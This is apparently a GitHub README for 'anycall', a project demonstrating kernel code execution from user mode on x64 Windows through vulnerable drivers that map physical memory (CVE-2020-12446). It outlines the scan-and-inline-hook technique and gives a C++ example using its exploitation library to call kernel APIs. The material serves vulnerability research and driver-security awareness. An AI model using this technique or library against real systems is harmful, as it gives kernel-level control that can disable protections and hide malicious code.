anycall

x64 Windows kernel code execution via user-mode, arbitrary syscall, vulnerable IOCTLs demonstration

Read: https://www.godeye.club/2021/05/14/001-x64-windows-kernel-code-execution-via-user.html

How it works

Allocate physical memory to user virtual memory
- Allows user-process to manupulate arbitrary physical memory without calling APIs
Search entire physical memory until we found function stub to hook, in ntoskrnl.exe physical memory
Once the stub found, place inline-hook on the stub
- simply jmp rax, detour address could be anything we want to invoke
syscall it
wow, we are user-mode but able to call kernel APIs

Goal of this project

This project is to demonstrate how drivers that allowing user-process to map physical memory for user, and how it is critical vulnerable.

Related CVEs:

CVE-2020-12446

libanycall

libanycall is the powerful c++ static-library that makes exploit execution of anycall more easily.

Usage

link it (e.g, #pragma comment( lib, "libanycall64" ))
include (e.g, #include "libanycall.h")

For example:

cpp
#include <windows.h>
#include <iostream>

#include "libanycall.h"

#pragma comment( lib, "libanycall64" )

using PsGetCurrentProcessId = HANDLE( __fastcall* )( void );

int main( const int argc, const char** argv, const char** envp )
{
    if ( !libanycall::init( "ntdll.dll", "NtTraceControl" ) )
    {
        printf( "[!] failed to init libanycall\n" );
        return EXIT_FAILURE;
    }
    
    // invoke NT kernel APIs from usermode
    const uint32_t process_id =
        ( uint32_t )ANYCALL_INVOKE( PsGetCurrentProcessId );

    printf( "PsGetCurrentProcessId returns %d\n", process_id );

    return EXIT_SUCCESS;
}

License

MIT

Anycall

anycall

How it works

Goal of this project

libanycall

Usage

License

Contributors

anycall

How it works

Goal of this project

libanycall

Usage

License

Contributors

Related Repositories